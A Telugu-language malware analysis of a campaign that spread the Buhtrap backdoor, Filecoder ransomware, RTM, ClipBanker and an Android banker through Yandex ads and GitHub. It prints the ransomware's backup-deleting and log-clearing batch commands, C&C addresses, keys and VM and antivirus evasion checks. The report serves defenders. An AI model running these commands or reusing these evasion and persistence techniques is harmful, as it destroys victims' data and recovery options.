బ్యాక్‌డోర్ మరియు బుహ్‌ట్రాప్ ఎన్‌క్రిప్టర్ Yandex.Direct ఉపయోగించి పంపిణీ చేయబడ్డాయి

సైబర్ దాడిలో అకౌంటెంట్లను లక్ష్యంగా చేసుకోవడానికి, మీరు వారు ఆన్‌లైన్‌లో శోధించే పని పత్రాలను ఉపయోగించవచ్చు. తెలిసిన బ్యాక్‌డోర్‌లను పంపిణీ చేస్తూ గత కొన్ని నెలలుగా సైబర్ గ్రూప్ చేస్తున్న పని ఇదే. బుహ్ట్రాప్ и RTM, అలాగే క్రిప్టోకరెన్సీలను దొంగిలించడానికి ఎన్‌క్రిప్టర్‌లు మరియు సాఫ్ట్‌వేర్. చాలా లక్ష్యాలు రష్యాలో ఉన్నాయి. Yandex.Directలో హానికరమైన ప్రకటనలు ఇవ్వడం ద్వారా దాడి జరిగింది. సంభావ్య బాధితులు ఒక వెబ్‌సైట్‌కి మళ్లించబడ్డారు, అక్కడ వారు డాక్యుమెంట్ టెంప్లేట్ వలె మారువేషంలో ఉన్న హానికరమైన ఫైల్‌ను డౌన్‌లోడ్ చేయమని అడిగారు. మా హెచ్చరిక తర్వాత Yandex హానికరమైన ప్రకటనలను తీసివేసింది.

Buhtrap యొక్క సోర్స్ కోడ్ గతంలో ఆన్‌లైన్‌లో లీక్ చేయబడింది కాబట్టి ఎవరైనా దానిని ఉపయోగించవచ్చు. RTM కోడ్ లభ్యతకు సంబంధించి మా వద్ద సమాచారం లేదు.

ఈ పోస్ట్‌లో దాడి చేసేవారు Yandex.Directని ఉపయోగించి మాల్‌వేర్‌ను ఎలా పంపిణీ చేశారో మరియు దానిని GitHubలో ఎలా హోస్ట్ చేశారో మేము మీకు తెలియజేస్తాము. మాల్వేర్ యొక్క సాంకేతిక విశ్లేషణతో పోస్ట్ ముగుస్తుంది.

బుహ్‌ట్రాప్ మరియు RTM తిరిగి వ్యాపారంలోకి వచ్చాయి

వ్యాప్తి మరియు బాధితుల యంత్రాంగం

బాధితులకు పంపిణీ చేయబడిన వివిధ పేలోడ్‌లు ఒక సాధారణ ప్రచార యంత్రాంగాన్ని పంచుకుంటాయి. దాడి చేసేవారు సృష్టించిన అన్ని హానికరమైన ఫైల్‌లు రెండు వేర్వేరు GitHub రిపోజిటరీలలో ఉంచబడ్డాయి.

సాధారణంగా, రిపోజిటరీ ఒక డౌన్‌లోడ్ చేయగల హానికరమైన ఫైల్‌ని కలిగి ఉంటుంది, ఇది తరచుగా మారుతూ ఉంటుంది. రిపోజిటరీకి మార్పుల చరిత్రను వీక్షించడానికి GitHub మిమ్మల్ని అనుమతిస్తుంది కాబట్టి, నిర్దిష్ట వ్యవధిలో ఏ మాల్వేర్ పంపిణీ చేయబడిందో మనం చూడవచ్చు. హానికరమైన ఫైల్‌ను డౌన్‌లోడ్ చేయమని బాధితుడిని ఒప్పించేందుకు, పై చిత్రంలో చూపిన వెబ్‌సైట్ blanki-shabloni24[.]ru ఉపయోగించబడింది.

సైట్ రూపకల్పన మరియు హానికరమైన ఫైల్‌ల యొక్క అన్ని పేర్లు ఒకే కాన్సెప్ట్‌ను అనుసరిస్తాయి - ఫారమ్‌లు, టెంప్లేట్‌లు, కాంట్రాక్ట్‌లు, నమూనాలు మొదలైనవి. గతంలో అకౌంటెంట్‌లపై దాడులలో బుహ్‌ట్రాప్ మరియు RTM సాఫ్ట్‌వేర్‌లు ఇప్పటికే ఉపయోగించబడుతున్నాయని మేము భావించాము. కొత్త ప్రచారంలో వ్యూహం అదే. దాడి చేసిన వారి వెబ్‌సైట్‌కు బాధితుడు ఎలా వచ్చాడనేది ఒక్కటే ప్రశ్న.

ఇన్ఫెక్షన్

ఈ సైట్‌లో చేరిన కనీసం అనేక మంది సంభావ్య బాధితులు హానికరమైన ప్రకటనల ద్వారా ఆకర్షితులయ్యారు. క్రింద ఒక ఉదాహరణ URL ఉంది:

https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456

మీరు లింక్ నుండి చూడగలిగినట్లుగా, బ్యానర్ చట్టబద్ధమైన అకౌంటింగ్ ఫోరమ్ bb.f2[.]kzలో పోస్ట్ చేయబడింది. బ్యానర్‌లు వేర్వేరు సైట్‌లలో కనిపించాయని, అన్నింటికీ ఒకే ప్రచార ఐడి (blanki_rsya) ఉందని మరియు అకౌంటింగ్ లేదా చట్టపరమైన సహాయ సేవలకు సంబంధించినవి ఉన్నాయని గమనించడం ముఖ్యం. సంభావ్య బాధితుడు "డౌన్‌లోడ్ ఇన్‌వాయిస్ ఫారమ్" అభ్యర్థనను ఉపయోగించినట్లు URL చూపిస్తుంది, ఇది లక్ష్య దాడుల గురించి మా పరికల్పనకు మద్దతు ఇస్తుంది. బ్యానర్‌లు కనిపించిన సైట్‌లు మరియు సంబంధిత శోధన ప్రశ్నలు క్రింద ఉన్నాయి.

• ఇన్‌వాయిస్ ఫారమ్‌ను డౌన్‌లోడ్ చేయండి – bb.f2[.]kz
• నమూనా ఒప్పందం - Ipopen[.]ru
• అప్లికేషన్ ఫిర్యాదు నమూనా - 77metrov[.]ru
• ఒప్పందం రూపం - blank-dogovor-kupli-prodazhi[.]ru
• నమూనా కోర్టు పిటిషన్ - zen.yandex[.]ru
• నమూనా ఫిర్యాదు - yurday[.]ru
• నమూనా ఒప్పంద ఫారమ్‌లు – రెగ్‌ఫోరమ్[.]ru
• కాంట్రాక్ట్ ఫారమ్ – అసిస్టెంటస్[.]రు
• నమూనా అపార్ట్మెంట్ ఒప్పందం - నాప్రవా[.]com
• చట్టపరమైన ఒప్పందాల నమూనాలు - అవిటో[.]రు

blanki-shabloni24[.]ru సైట్ సాధారణ దృశ్య అంచనాను పాస్ చేయడానికి కాన్ఫిగర్ చేయబడి ఉండవచ్చు. సాధారణంగా, GitHubకి లింక్‌తో ప్రొఫెషనల్‌గా కనిపించే సైట్‌ని సూచించే ప్రకటన స్పష్టంగా చెడ్డదిగా అనిపించదు. అదనంగా, దాడి చేసేవారు హానికరమైన ఫైల్‌లను రిపోజిటరీకి పరిమిత కాలానికి మాత్రమే అప్‌లోడ్ చేశారు, ప్రచారం సమయంలో ఉండవచ్చు. ఎక్కువ సమయం, GitHub రిపోజిటరీ ఖాళీ జిప్ ఆర్కైవ్ లేదా ఖాళీ EXE ఫైల్‌ను కలిగి ఉంటుంది. అందువల్ల, దాడి చేసేవారు నిర్దిష్ట శోధన ప్రశ్నలకు ప్రతిస్పందనగా వచ్చిన అకౌంటెంట్లు ఎక్కువగా సందర్శించే సైట్‌లలో Yandex.Direct ద్వారా ప్రకటనలను పంపిణీ చేయవచ్చు.

తరువాత, ఈ విధంగా పంపిణీ చేయబడిన వివిధ పేలోడ్‌లను చూద్దాం.

పేలోడ్ విశ్లేషణ

పంపిణీ యొక్క కాలక్రమం

హానికరమైన ప్రచారం అక్టోబర్ 2018 చివరిలో ప్రారంభమైంది మరియు వ్రాసే సమయంలో చురుకుగా ఉంది. మొత్తం రిపోజిటరీ GitHubలో పబ్లిక్‌గా అందుబాటులో ఉన్నందున, మేము ఆరు వేర్వేరు మాల్వేర్ కుటుంబాల పంపిణీకి సంబంధించిన ఖచ్చితమైన టైమ్‌లైన్‌ను సంకలనం చేసాము (క్రింద ఉన్న బొమ్మను చూడండి). మేము git చరిత్రతో పోల్చడం కోసం ESET టెలిమెట్రీ ద్వారా కొలవబడిన బ్యానర్ లింక్ ఎప్పుడు కనుగొనబడిందో చూపించే పంక్తిని జోడించాము. మీరు చూడగలిగినట్లుగా, ఇది GitHubలో పేలోడ్ లభ్యతతో బాగా సంబంధం కలిగి ఉంటుంది. ఫిబ్రవరి చివరిలో ఉన్న వ్యత్యాసాన్ని మేము పూర్తిగా పొందేలోపు GitHub నుండి రిపోజిటరీ తీసివేయబడినందున మార్పు చరిత్రలో మాకు భాగం లేదని వివరించవచ్చు.

మూర్తి 1. మాల్వేర్ పంపిణీ యొక్క కాలక్రమం.

కోడ్ సంతకం సర్టిఫికెట్లు

ప్రచారం బహుళ ప్రమాణపత్రాలను ఉపయోగించింది. కొన్ని ఒకటి కంటే ఎక్కువ మాల్వేర్ కుటుంబాలు సంతకం చేశాయి, ఇది ఒకే ప్రచారానికి చెందిన వివిధ నమూనాలను సూచిస్తుంది. ప్రైవేట్ కీ అందుబాటులో ఉన్నప్పటికీ, ఆపరేటర్‌లు బైనరీలపై క్రమపద్ధతిలో సంతకం చేయలేదు మరియు అన్ని నమూనాల కోసం కీని ఉపయోగించలేదు. ఫిబ్రవరి 2019 చివరిలో, దాడి చేసే వ్యక్తులు తమ వద్ద ప్రైవేట్ కీ లేని Google యాజమాన్యంలోని సర్టిఫికేట్‌ను ఉపయోగించి చెల్లని సంతకాలను సృష్టించడం ప్రారంభించారు.

ప్రచారంలో పాల్గొన్న అన్ని ధృవపత్రాలు మరియు వారు సంతకం చేసిన మాల్వేర్ కుటుంబాలు దిగువ పట్టికలో జాబితా చేయబడ్డాయి.

మేము ఇతర మాల్వేర్ కుటుంబాలతో లింక్‌లను ఏర్పాటు చేయడానికి ఈ కోడ్ సంతకం సర్టిఫికేట్‌లను కూడా ఉపయోగించాము. చాలా సర్టిఫికేట్‌ల కోసం, మేము GitHub రిపోజిటరీ ద్వారా పంపిణీ చేయని నమూనాలను కనుగొనలేదు. అయినప్పటికీ, బోట్‌నెట్‌కు చెందిన మాల్‌వేర్‌పై సంతకం చేయడానికి TOV “MARIYA” ప్రమాణపత్రం ఉపయోగించబడింది Wauchos, యాడ్వేర్ మరియు మైనర్లు. ఈ మాల్వేర్ ఈ ప్రచారానికి సంబంధించినది కాదు. చాలా మటుకు, సర్టిఫికేట్ డార్క్‌నెట్‌లో కొనుగోలు చేయబడింది.

Win32/Filecoder.Buhtrap

మన దృష్టిని ఆకర్షించిన మొదటి భాగం కొత్తగా కనుగొనబడిన Win32/Filecoder.Buhtrap. ఇది డెల్ఫీ బైనరీ ఫైల్, ఇది కొన్నిసార్లు ప్యాక్ చేయబడుతుంది. ఇది ప్రధానంగా ఫిబ్రవరి-మార్చి 2019లో పంపిణీ చేయబడింది. ఇది ransomware ప్రోగ్రామ్‌కు తగినట్లుగా ప్రవర్తిస్తుంది - ఇది స్థానిక డ్రైవ్‌లు మరియు నెట్‌వర్క్ ఫోల్డర్‌లను శోధిస్తుంది మరియు కనుగొనబడిన ఫైల్‌లను గుప్తీకరిస్తుంది. ఎన్‌క్రిప్షన్ కీలను పంపడానికి ఇది సర్వర్‌ని సంప్రదించనందున రాజీపడటానికి దీనికి ఇంటర్నెట్ కనెక్షన్ అవసరం లేదు. బదులుగా, ఇది విమోచన సందేశం ముగింపుకు “టోకెన్”ని జోడిస్తుంది మరియు ఆపరేటర్‌లను సంప్రదించడానికి ఇమెయిల్ లేదా బిట్‌మెసేజ్‌ని ఉపయోగించమని సూచిస్తుంది.

వీలైనన్ని ఎక్కువ సున్నితమైన వనరులను గుప్తీకరించడానికి, Filecoder.Buhtrap గుప్తీకరణకు అంతరాయం కలిగించే విలువైన సమాచారాన్ని కలిగి ఉన్న ఓపెన్ ఫైల్ హ్యాండ్లర్‌లను కలిగి ఉండే కీ సాఫ్ట్‌వేర్‌ను మూసివేయడానికి రూపొందించిన థ్రెడ్‌ను అమలు చేస్తుంది. లక్ష్య ప్రక్రియలు ప్రధానంగా డేటాబేస్ నిర్వహణ వ్యవస్థలు (DBMS). అదనంగా, Filecoder.Buhtrap డేటా రికవరీ కష్టతరం చేయడానికి లాగ్ ఫైల్‌లు మరియు బ్యాకప్‌లను తొలగిస్తుంది. దీన్ని చేయడానికి, దిగువ బ్యాచ్ స్క్రిప్ట్‌ను అమలు చేయండి.

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled

Filecoder.Buhtrap వెబ్‌సైట్ సందర్శకుల గురించి సమాచారాన్ని సేకరించడానికి రూపొందించిన చట్టబద్ధమైన ఆన్‌లైన్ IP లాగర్ సేవను ఉపయోగిస్తుంది. ఇది కమాండ్ లైన్ యొక్క బాధ్యత అయిన ransomware బాధితులను ట్రాక్ చేయడానికి ఉద్దేశించబడింది:

mshta.exe "javascript:document.write('');"

మూడు మినహాయింపు జాబితాలతో సరిపోలకపోతే ఎన్‌క్రిప్షన్ కోసం ఫైల్‌లు ఎంపిక చేయబడతాయి. ముందుగా, కింది పొడిగింపులతో ఉన్న ఫైల్‌లు ఎన్‌క్రిప్ట్ చేయబడవు: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys మరియు .బ్యాట్. రెండవది, దిగువ జాబితా నుండి పూర్తి మార్గం డైరెక్టరీ స్ట్రింగ్‌లను కలిగి ఉన్న అన్ని ఫైల్‌లు మినహాయించబడ్డాయి.

.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel

మూడవది, కొన్ని ఫైల్ పేర్లు కూడా ఎన్క్రిప్షన్ నుండి మినహాయించబడ్డాయి, వాటిలో విమోచన సందేశం యొక్క ఫైల్ పేరు. జాబితా క్రింద ప్రదర్శించబడింది. సహజంగానే, ఈ మినహాయింపులన్నీ మెషీన్‌ను రన్నింగ్‌లో ఉంచడానికి ఉద్దేశించబడ్డాయి, కానీ తక్కువ రహదారికి సంబంధించినవి.

boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe

ఫైల్ ఎన్క్రిప్షన్ పథకం

ఒకసారి అమలు చేయబడిన తర్వాత, మాల్వేర్ 512-బిట్ RSA కీ జతను ఉత్పత్తి చేస్తుంది. ప్రైవేట్ ఘాతాంకం (d) మరియు మాడ్యులస్ (n) అప్పుడు హార్డ్-కోడెడ్ 2048-బిట్ పబ్లిక్ కీ (పబ్లిక్ ఎక్స్‌పోనెంట్ మరియు మాడ్యులస్), zlib-ప్యాక్డ్ మరియు బేస్64 ఎన్‌కోడ్‌తో గుప్తీకరించబడతాయి. దీనికి బాధ్యత వహించే కోడ్ మూర్తి 2లో చూపబడింది.

మూర్తి 2. 512-బిట్ RSA కీ జత ఉత్పత్తి ప్రక్రియ యొక్క హెక్స్-కిరణాల డీకంపైలేషన్ ఫలితం.

విమోచన సందేశానికి జోడించబడిన టోకెన్ అయిన ప్రైవేట్ కీతో కూడిన సాదా వచనానికి ఉదాహరణ క్రింద ఉంది.

DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239

దాడి చేసేవారి పబ్లిక్ కీ క్రింద ఇవ్వబడింది.

e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD

ఫైల్‌లు 128-బిట్ కీతో AES-256-CBCని ఉపయోగించి ఎన్‌క్రిప్ట్ చేయబడతాయి. ప్రతి ఎన్క్రిప్టెడ్ ఫైల్ కోసం, ఒక కొత్త కీ మరియు కొత్త ఇనిషియలైజేషన్ వెక్టర్ ఉత్పత్తి చేయబడతాయి. గుప్తీకరించిన ఫైల్ చివరకి కీలక సమాచారం జోడించబడుతుంది. గుప్తీకరించిన ఫైల్ ఆకృతిని పరిశీలిద్దాం.
గుప్తీకరించిన ఫైల్‌లు క్రింది శీర్షికను కలిగి ఉంటాయి:

VEGA మేజిక్ విలువతో కూడిన సోర్స్ ఫైల్ డేటా మొదటి 0x5000 బైట్‌లకు ఎన్‌క్రిప్ట్ చేయబడింది. మొత్తం డిక్రిప్షన్ సమాచారం కింది నిర్మాణంతో ఫైల్‌కు జోడించబడింది:

- ఫైల్ పరిమాణం మార్కర్ ఫైల్ పరిమాణంలో 0x5000 బైట్‌ల కంటే పెద్దదిగా ఉందో లేదో సూచించే గుర్తును కలిగి ఉంటుంది
— AES కీ బొట్టు = ZlibCompress(RSAEncrypt(AES కీ + IV, ఉత్పత్తి చేయబడిన RSA కీ జత యొక్క పబ్లిక్ కీ))
- RSA కీ బొట్టు = ZlibCompress(RSAEncrypt(జెనరేట్ చేయబడిన RSA ప్రైవేట్ కీ, హార్డ్-కోడెడ్ RSA పబ్లిక్ కీ))

Win32/ClipBanker

Win32/ClipBanker అనేది అక్టోబర్ చివరి నుండి డిసెంబర్ 2018 ప్రారంభం వరకు అడపాదడపా పంపిణీ చేయబడిన ఒక భాగం. క్లిప్‌బోర్డ్ యొక్క కంటెంట్‌లను పర్యవేక్షించడం దీని పాత్ర, ఇది క్రిప్టోకరెన్సీ వాలెట్ల చిరునామాల కోసం చూస్తుంది. లక్ష్య వాలెట్ చిరునామాను నిర్ణయించిన తర్వాత, ClipBanker దానిని ఆపరేటర్‌లకు చెందినదిగా విశ్వసించే చిరునామాతో భర్తీ చేస్తుంది. మేము పరిశీలించిన నమూనాలు బాక్స్డ్ లేదా అస్పష్టంగా లేవు. ప్రవర్తనను మాస్క్ చేయడానికి ఉపయోగించే ఏకైక మెకానిజం స్ట్రింగ్ ఎన్‌క్రిప్షన్. ఆపరేటర్ వాలెట్ చిరునామాలు RC4ని ఉపయోగించి గుప్తీకరించబడతాయి. టార్గెట్ క్రిప్టోకరెన్సీలు Bitcoin, Bitcoin cash, Dogecoin, Ethereum మరియు Ripple.

దాడి చేసేవారి బిట్‌కాయిన్ వాలెట్‌లకు మాల్వేర్ వ్యాప్తి చెందుతున్న కాలంలో, ఒక చిన్న మొత్తం VTSకి పంపబడింది, ఇది ప్రచారం యొక్క విజయంపై సందేహాన్ని కలిగిస్తుంది. అదనంగా, ఈ లావాదేవీలు క్లిప్‌బ్యాంకర్‌కు సంబంధించినవని సూచించడానికి ఎటువంటి ఆధారాలు లేవు.

Win32/RTM

Win32/RTM భాగం మార్చి 2019 ప్రారంభంలో చాలా రోజుల పాటు పంపిణీ చేయబడింది. RTM అనేది రిమోట్ బ్యాంకింగ్ వ్యవస్థలను లక్ష్యంగా చేసుకుని డెల్ఫీలో వ్రాయబడిన ట్రోజన్ బ్యాంకర్. 2017లో, ESET పరిశోధకులు ప్రచురించారు వివరణాత్మక విశ్లేషణ ఈ ప్రోగ్రామ్ యొక్క వివరణ ఇప్పటికీ సంబంధితంగా ఉంది. జనవరి 2019లో, పాలో ఆల్టో నెట్‌వర్క్‌లు కూడా విడుదలయ్యాయి RTM గురించి బ్లాగ్ పోస్ట్.

బుహ్ట్రాప్ లోడర్

కొంత కాలం వరకు, GitHubలో ఒక డౌన్‌లోడర్ అందుబాటులో ఉంది, అది మునుపటి Buhtrap టూల్స్‌ను పోలి ఉండదు. అతను తిరుగుతాడు https://94.100.18[.]67/RSS.php?<some_id> తదుపరి దశను పొందడానికి మరియు దానిని నేరుగా మెమరీలోకి లోడ్ చేస్తుంది. మేము రెండవ దశ కోడ్ యొక్క రెండు ప్రవర్తనలను వేరు చేయవచ్చు. మొదటి URLలో, RSS.php నేరుగా బుహ్‌ట్రాప్ బ్యాక్‌డోర్‌ను పాస్ చేసింది - ఈ బ్యాక్‌డోర్ సోర్స్ కోడ్ లీక్ అయిన తర్వాత అందుబాటులో ఉన్న దానితో సమానంగా ఉంటుంది.

ఆసక్తికరంగా, మేము బుహ్‌ట్రాప్ బ్యాక్‌డోర్‌తో అనేక ప్రచారాలను చూస్తాము మరియు అవి వేర్వేరు ఆపరేటర్‌లచే అమలు చేయబడుతున్నాయి. ఈ సందర్భంలో, ప్రధాన వ్యత్యాసం ఏమిటంటే, బ్యాక్‌డోర్ నేరుగా మెమరీలోకి లోడ్ చేయబడుతుంది మరియు మేము మాట్లాడిన DLL విస్తరణ ప్రక్రియతో సాధారణ పథకాన్ని ఉపయోగించదు. ముందు. అదనంగా, ఆపరేటర్లు C&C సర్వర్‌కు నెట్‌వర్క్ ట్రాఫిక్‌ను గుప్తీకరించడానికి ఉపయోగించే RC4 కీని మార్చారు. మేము చూసిన చాలా ప్రచారాలలో, ఆపరేటర్లు ఈ కీని మార్చడానికి ఇబ్బంది పడలేదు.

రెండవది, మరింత సంక్లిష్టమైన ప్రవర్తన RSS.php URL మరొక లోడర్‌కు పంపబడింది. ఇది డైనమిక్ దిగుమతి పట్టికను పునర్నిర్మించడం వంటి కొన్ని అస్పష్టతను అమలు చేసింది. బూట్‌లోడర్ యొక్క ఉద్దేశ్యం C&C సర్వర్‌ని సంప్రదించడం msiofficeupd[.]com/api/F27F84EDA4D13B15/2, లాగ్‌లను పంపండి మరియు ప్రతిస్పందన కోసం వేచి ఉండండి. ఇది ప్రతిస్పందనను బొట్టుగా ప్రాసెస్ చేస్తుంది, దానిని మెమరీలోకి లోడ్ చేస్తుంది మరియు దానిని అమలు చేస్తుంది. ఈ లోడర్‌ని అమలు చేయడంలో మేము చూసిన పేలోడ్ అదే బుహ్‌ట్రాప్ బ్యాక్‌డోర్, కానీ ఇతర భాగాలు ఉండవచ్చు.

Android/Spy.Banker

ఆసక్తికరంగా, Android కోసం ఒక భాగం GitHub రిపోజిటరీలో కూడా కనుగొనబడింది. అతను ఒక రోజు మాత్రమే ప్రధాన శాఖలో ఉన్నాడు - నవంబర్ 1, 2018. GitHubలో పోస్ట్ చేయడమే కాకుండా, ESET టెలిమెట్రీ ఈ మాల్వేర్ పంపిణీ చేయబడిందని ఎటువంటి ఆధారాలు కనుగొనలేదు.

భాగం Android అప్లికేషన్ ప్యాకేజీ (APK) వలె హోస్ట్ చేయబడింది. ఇది భారీగా అస్పష్టంగా ఉంది. APKలో ఉన్న ఎన్‌క్రిప్టెడ్ JARలో హానికరమైన ప్రవర్తన దాగి ఉంది. ఇది ఈ కీని ఉపయోగించి RC4తో గుప్తీకరించబడింది:

key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]

స్ట్రింగ్‌లను గుప్తీకరించడానికి అదే కీ మరియు అల్గోరిథం ఉపయోగించబడతాయి. JAR లో ఉంది APK_ROOT + image/files. ఫైల్ యొక్క మొదటి 4 బైట్‌లు ఎన్‌క్రిప్టెడ్ JAR యొక్క పొడవును కలిగి ఉంటాయి, ఇది పొడవు ఫీల్డ్ తర్వాత వెంటనే ప్రారంభమవుతుంది.

ఫైల్‌ను డీక్రిప్ట్ చేసిన తర్వాత, అది అనుబిస్ అని మేము కనుగొన్నాము - ఇదివరకే డాక్యుమెంట్ చేయబడింది Android కోసం బ్యాంకర్. మాల్వేర్ కింది లక్షణాలను కలిగి ఉంది:

• మైక్రోఫోన్ రికార్డింగ్
• స్క్రీన్‌షాట్‌లు తీయడం
• GPS కోఆర్డినేట్‌లను పొందడం
• కీలాగర్
• పరికర డేటా ఎన్క్రిప్షన్ మరియు విమోచన డిమాండ్
• స్పామ్ పంపడం

ఆసక్తికరంగా, బ్యాంకర్ మరొక C&C సర్వర్‌ని పొందేందుకు Twitterను బ్యాకప్ కమ్యూనికేషన్ ఛానెల్‌గా ఉపయోగించారు. మేము విశ్లేషించిన నమూనా @JonesTrader ఖాతాను ఉపయోగించింది, కానీ విశ్లేషణ సమయంలో ఇది ఇప్పటికే బ్లాక్ చేయబడింది.

బ్యాంకర్ Android పరికరంలో లక్ష్య అనువర్తనాల జాబితాను కలిగి ఉన్నారు. ఇది సోఫోస్ అధ్యయనంలో పొందిన జాబితా కంటే ఎక్కువ. జాబితాలో అనేక బ్యాంకింగ్ అప్లికేషన్లు, Amazon మరియు eBay వంటి ఆన్‌లైన్ షాపింగ్ ప్రోగ్రామ్‌లు మరియు క్రిప్టోకరెన్సీ సేవలు ఉన్నాయి.

MSIL/ClipBanker.IH

ఈ ప్రచారంలో భాగంగా పంపిణీ చేయబడిన చివరి భాగం .NET Windows ఎక్జిక్యూటబుల్, ఇది మార్చి 2019లో కనిపించింది. అధ్యయనం చేసిన చాలా సంస్కరణలు ConfuserEx v1.0.0తో ప్యాక్ చేయబడ్డాయి. ClipBanker వలె, ఈ భాగం క్లిప్‌బోర్డ్‌ను ఉపయోగిస్తుంది. అతని లక్ష్యం క్రిప్టోకరెన్సీల విస్తృత శ్రేణి, అలాగే ఆవిరిపై ఆఫర్లు. అదనంగా, అతను బిట్‌కాయిన్ ప్రైవేట్ WIF కీని దొంగిలించడానికి IP లాగర్ సేవను ఉపయోగిస్తాడు.

రక్షణ మెకానిజమ్స్
డీబగ్గింగ్, డంపింగ్ మరియు ట్యాంపరింగ్‌ను నిరోధించడంలో ConfuserEx అందించే ప్రయోజనాలతో పాటు, యాంటీవైరస్ ఉత్పత్తులు మరియు వర్చువల్ మెషీన్‌లను గుర్తించే సామర్థ్యాన్ని కలిగి ఉంటుంది.

ఇది వర్చువల్ మెషీన్‌లో నడుస్తుందని ధృవీకరించడానికి, మాల్వేర్ BIOS సమాచారాన్ని అభ్యర్థించడానికి అంతర్నిర్మిత Windows WMI కమాండ్ లైన్ (WMIC)ని ఉపయోగిస్తుంది, అవి:

wmic bios

అప్పుడు ప్రోగ్రామ్ కమాండ్ అవుట్‌పుట్‌ను అన్వయిస్తుంది మరియు కీలకపదాల కోసం చూస్తుంది: VBOX, VirtualBox, XEN, qemu, bochs, VM.

యాంటీవైరస్ ఉత్పత్తులను గుర్తించడానికి, మాల్వేర్ విండోస్ సెక్యూరిటీ సెంటర్‌కు విండోస్ మేనేజ్‌మెంట్ ఇన్‌స్ట్రుమెంటేషన్ (WMI) అభ్యర్థనను పంపుతుంది ManagementObjectSearcher క్రింద చూపిన విధంగా API. బేస్ 64 నుండి డీకోడింగ్ చేసిన తర్వాత కాల్ ఇలా కనిపిస్తుంది:

ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')

మూర్తి 3. యాంటీవైరస్ ఉత్పత్తులను గుర్తించే ప్రక్రియ.

అదనంగా, మాల్వేర్ లేదో తనిఖీ చేస్తుంది క్రిప్టోక్లిప్‌వాచర్.

పట్టుదల

మేము అధ్యయనం చేసిన మాల్వేర్ వెర్షన్ దానికదే కాపీ అవుతుంది %APPDATA%googleupdater.exe మరియు google డైరెక్టరీకి "దాచిన" లక్షణాన్ని సెట్ చేస్తుంది. అప్పుడు ఆమె విలువను మారుస్తుంది SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell Windows రిజిస్ట్రీలో మరియు మార్గాన్ని జోడిస్తుంది updater.exe. ఈ విధంగా, వినియోగదారు లాగిన్ అయిన ప్రతిసారీ మాల్వేర్ అమలు చేయబడుతుంది.

హానికరమైన ప్రవర్తన

క్లిప్‌బ్యాంకర్ వలె, మాల్వేర్ క్లిప్‌బోర్డ్‌లోని కంటెంట్‌లను పర్యవేక్షిస్తుంది మరియు క్రిప్టోకరెన్సీ వాలెట్ చిరునామాల కోసం చూస్తుంది మరియు కనుగొనబడినప్పుడు, దానిని ఆపరేటర్ చిరునామాలలో ఒకదానితో భర్తీ చేస్తుంది. కోడ్‌లో కనుగొనబడిన వాటి ఆధారంగా లక్ష్య చిరునామాల జాబితా క్రింద ఉంది.

